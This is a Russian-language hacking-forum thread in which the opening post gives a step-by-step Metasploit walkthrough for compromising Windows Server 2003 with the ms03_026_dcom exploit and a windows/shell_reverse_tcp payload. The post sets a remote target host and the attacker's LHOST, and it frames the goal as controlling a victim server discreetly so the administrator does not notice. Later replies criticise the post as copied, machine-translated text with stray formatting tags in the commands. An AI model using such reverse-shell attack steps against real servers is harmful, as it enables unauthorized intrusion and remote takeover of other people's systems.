• Codeby web-security - Курс "Тестирование Веб-Приложений на проникновение с нуля" от команды codeby. Общая теория, подготовка рабочего окружения, пассивный фаззинг и фингерпринт, Активный фаззинг, Уязвимости, Пост-эксплуатация, Инструментальные средства, Social Engeneering и многое другое. Подробнее ...

  • Мобильный клиент нашего форума для Android гаджетов доступен в Google Play Market по этой ссылке. Клиент можно скачать с нашего форума по этой ссылке. Последняя версия МК в нашем телеграм канале вот здесь

Как взять под контроль Windows Server 2003 удаленно, запустив обратную оболочку

Bahonrex

Well-known member
02.10.2017
53
23
#1
Всем привет
Сижу значить смотрю свой любимый форум))(CODEBY)
И как вдруг написал мне Друг. И спрашивает как залить эксплоит на сервер. Было это 1-2 месяца назад. В тот момент я понятие не имел как это вообще работает. И решил помочь ему. И пошёл копать информацию.
И через неделю несколько я получил что хотел)))
Вот результаты.

Сейчас мы попытаемся установить командную строку на сервере 2003, которая позволит нам удаленно выполнять команду в системе.
Хорошо, загрузите свою Linux-машину(или же Windowsз or Mac) и запустите консоль Metasploit, и давайте начнем!
Экран запуска должен выглядеть следующим образом:
upload_2018-1-2_20-48-46.png

1) Найдите Exploit )
Теперь давайте искать подходящий эксплойт, чтобы взломать эту систему 2003 года. Наберите:

Код:
[B]msf> search platform:windows type:exploit[/B]
Это должно дать нам список эксплойтов, которые мы можем использовать для систем Windows.

upload_2018-1-2_20-52-36.png
2)Выберите свой любимый
Давайте выберем проверенный и действительный эксплойт, который почти всегда успешно работает с Windows Server 2003, использует / windows / dcerpc / ms03_026_dcom. Тип:

Код:
msf> use exploit / windows / dcerpc / ms03_026_dcom
Чтобы получить дополнительную информацию об этом эксплойте, наберите:

Код:
msf exploit (ms03_26_dcom) info
upload_2018-1-2_20-55-21.png
3) Проверьте свои параметры
Чтобы начать использовать этот Windows Server 2003, сначала нужно проверить наши параметры. Тип:

Код:
[/B]msf> show options[B]

Обратите внимание, что нам нужно установить RHOST или удаленный хост системы, которую мы используем. В моем случае это 78.XX.XXX.XXX (ваш, скорее всего, будет отличаться). Поэтому мы установили наш RHOST на 78.XX.XXX.XXX


Код:
[/B][/B]msf> set RHOST [B][B]78.XX.XXX.XXX[B][B]

upload_2018-1-2_21-7-41.png
4)Показать полезную нагрузку
Затем нам нужно установить полезную нагрузку для использования системы Windows Server 2003. В нашем случае мы рассмотрим возможность установки командной оболочки на серверной системе, чтобы мы могли управлять ею удаленно и дискретно. Мы могли бы отправить что-то вроде полезной информации VNC, где мы могли бы получить графический интерфейс системы, но это, скорее всего, будет замечено администратором системы, поскольку он видит, что его мышь перемещается по экрану. Мы будем использовать полезную нагрузку VNC в будущем взломе.

Итак, чтобы узнать, какие полезные ресурсы нам доступны, нам просто нужно ввести show payloads, а Metasploit перечислит все полезные ресурсы для этого эксплойта.


Код:
[/B][/B]msf > show payloads[B][B]
[/B][/B]
upload_2018-1-2_21-8-39.png

5) Подключение
См. Полезную нагрузку в верхней части с именем windows / shell_reverse_tcp? Это тот, который мы хотим использовать. Он подключится к окну Windows Server 2003 и вернет нам командную оболочку для удаленного управления системой жертвы. Тип:

Код:
set PAYLOAD windows/shell_reverse_tcp
6) Задайте параметры полезной нагрузки

Теперь, когда мы установили эксплойт и полезную нагрузку, осталось только указать параметры полезной нагрузки. Тип:

Код:
[B]msf> [/B]show options
upload_2018-1-2_21-23-2.png

Как видно из приведенного выше скриншота, эта полезная нагрузка требует, чтобы мы установили LHOST или локальный хост. Другими словами, нам нужно сообщить полезную нагрузку, в какой системе мы хотим, чтобы командная оболочка подключалась обратно. Это были бы мы! Итак, дайте ему свой IP-адрес. Мой - 192.168.1.XXX, поэтому я набрал:Как видно из приведенного выше скриншота, эта полезная нагрузка требует, чтобы мы установили LHOST или локальный хост. Другими словами, нам нужно сообщить полезную нагрузку, в какой системе мы хотим, чтобы командная оболочка подключалась обратно. Это были бы мы! Итак, дайте ему свой IP-адрес. Мой - 192.168.1.XXX, поэтому я набрал:
Код:
[B]msf> [/B] set LHOST 192.168.1.XXX
Код:
msf> exploit
Metasploit отправит полезную нагрузку в систему Windows Server 2003 и вернет вам командную строку. Теперь у вас есть (pwn) эта система! Если вы не получите приглашение командной строки в первый раз, повторите попытку, так как ни один из этих эксплойтов не работает на 100% каждый раз.
Так же работает и (Windows NT, 2000, XP и 2003)


)(Писал в спешке особенно последний Часть)
 

Вложения

Последнее редактирование:

Diplomat

Премиум
28.11.2017
16
3
#2
Отличный метод, рекомендую вообще изучить Metasploit! Огонь полный!
 

Remir

Премиум
05.11.2017
209
323
#3
Не разделяю восторга предыдущего поста. И будь в форуме кнопка "не нравится", я бы нажал на нее.
И сейчас поясню причину.

После прочтения пары абзацев у меня возникло смутное ощущение неестественности изложения и я начал более внимательно вникать в текст. И понял причину своей настороженности.
Бравурное начало с привкусом лести не скрывает грубых ошибок, которые ТС, по всей видимости, даже не считает таковыми, а смену стиля изложения уже просто невозможно не заметить, если продолжать читать дальше.

Уважаемый @Bahonrex , я попрошу не обижаться, читая дальнейшее. Впрочем, я выражаю исключительно свое частное мнение и оно может не совпадать с мнением Администратора и остальных участников форума.
Вас уже предупреждали насчет отношения к копипасту и вы пообещали учесть это. Но это пока так и осталось словами...
И как вдруг написал мне Друг... И через неделю несколько я получил что хотел
Как-то странно, не по-русски звучит. Впрочем, черт с ним, с русским! Сейчас дело в общем изложении.
Хорошо, загрузите свою Linux-машину(или же Windowsз or Mac)
"Linux-машину" - это типичное выражение машинного перевода английского "Linux machine". Человек так не говорит )). А союз OR между Windows и MAC только подтверждает копипаст.
Код:
[.B.]msf> search platform:windows type:exploit
[/.B.]
(точки я специально добавил)
Ты не подумал о новичках, которым придется читать твой пост? Зачем оставил в командах ВВ-коды? Начинающий может прямо так и начать вводить. Да-да, не улыбайся! Мне приходилось сталкиваться с такими. Хочешь выделить поле "Код" - ставь коды выделения до и после QUOTE, в не в их полях.
Теперь давайте искать подходящий эксплойт, чтобы взломать эту систему 2003 года
На этом я остановился. Мне очень много приходится читать, но такого выражения я не встречал. Ну не "выражОВЫВаются" так! :)

Долго искать не стал. Вот первоисточник:
Для просмотра контента необходимо: Войти или зарегистрироваться

Текст практически слово в слово. Кроме того, у него это дело гораздо позже "слизал" вот этот блог
Для просмотра контента необходимо: Войти или зарегистрироваться

Но, к твоей чести, замечу, что если это не скопировано с неиндексируемого (закрытого) форума, то скрины - твои собственные. Я не поручусь по причине дефицита времени, но процентов 90 дал бы за это.
Трудно, что-ли, было текст обработать? Если учесть, что он для старой, как экскременты динозавра, системы (и даже снятой с поддержки), то материал получается вообще никуда не годным. Это мое личное мнение.
 

Bahonrex

Well-known member
02.10.2017
53
23
#4
Н

"Linux-машину" - это типичное выражение машинного перевода английского "Linux machine". Человек так не говорит )). А союз OR между Windows и MAC только подтверждает копипаст.
Тут я сам писал а взял слова Машину так как видел много постов где использовали это слова
(точки я специально добавил)
Ты не подумал о новичках, которым придется читать твой пост? Зачем оставил в командах ВВ-коды? Начинающий может прямо так и начать вводить. Да-да, не улыбайся! Мне приходилось сталкиваться с такими. Хочешь выделить поле "Код" - ставь коды выделения до и после QUOTE, в не в их полях.
А тут ВВ потому что когда я брал определенный код в [code ) я ошибся в слешах



Долго искать не стал. Вот первоисточник:
***Скрытый текст***
Да опять же весь текст не мой
Но я не с этого сайта брал
[doublepost=1514928095,1514927962][/doublepost]Хорошо извините за мое тупость.
Дайте мне ещё один шанс.
И я исправлюсь.
 

Remir

Премиум
05.11.2017
209
323
#5
О чем ты говоришь? Я такой же, как и ты. Простой пользователь. И желаю тебе только добра. :)
Я дал тебе в личку два совета. И вот третий: будь всегда самим собой!
Не нужно хитро*опить ))
 

Bahonrex

Well-known member
02.10.2017
53
23
#6
О чем ты говоришь? Я такой же, как и ты. Простой пользователь. И желаю тебе только добра. :)
Я дал тебе в личку два совета. И вот третий: будь всегда самим собой!
Не нужно хитро*опить ))
Ну вы первый человек который пожелали мне удачи.
И я обложался перед вами опять.
Мне из за этого стыдно(
 

Remir

Премиум
05.11.2017
209
323
#7
Ну вы первый человек который пожелали мне удачи
Я почему-то убежден, что не единственный. )) Просто первый. :)
А вот это как раз хорошо. Значит будет уроком. И будет польза. Для тебя.
Не тушуйся ;). В жизни всякое бывает.
Но учти в дальнейшем, что доверие зарабатывается иногда годами, а теряется в один миг.
Короче, "проехали" ))
 
Симпатии: Понравилось Vertigo

Bahonrex

Well-known member
02.10.2017
53
23
#8
Я почему-то убежден, что не единственный. )) Просто первый. :)

А вот это как раз хорошо. Значит будет уроком. И будет польза. Для тебя.
Не тушуйся ;). В жизни всякое бывает.
Но учти в дальнейшем, что доверие зарабатывается иногда годами, а теряется в один миг.
Короче, "проехали" ))
Окей спасибо за Советы )
 

Sykes

Well-known member
17.10.2017
138
83
#9
Хоть и копипаст, но ББ-Код нужно было убрать уж точно.
Но за попытку что-то принести на форум поставлю мне нравится.
Желаю удачи в изучении и всего самого хорошего.
 
Вверх Снизу